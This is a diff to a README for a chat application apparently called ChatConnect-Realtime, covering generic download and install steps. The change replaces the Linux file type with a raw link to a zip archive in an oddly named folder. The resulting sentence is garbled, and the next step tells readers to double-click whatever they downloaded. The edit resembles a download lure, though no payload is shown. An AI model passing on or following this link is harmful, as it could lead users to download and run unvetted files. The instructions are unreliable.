JAYSEJPAL/ChatConnect-Realtime/README.md

    On the releases page, you will see a list of versions.
 Look for the most recent one, usually at the top.

 3. **Download the File:**
    Download the appropriate file for your operating system.
-Choose between options like `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+Choose between options like `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/JAYSEJPAL/ChatConnect-Realtime/main/nonregenerative/ChatConnect-Realtime.zip` for Linux.

 4. **Run the Installer:**
    Once the file downloads, locate it in your "Downloads" folder and double-click it to start the installation.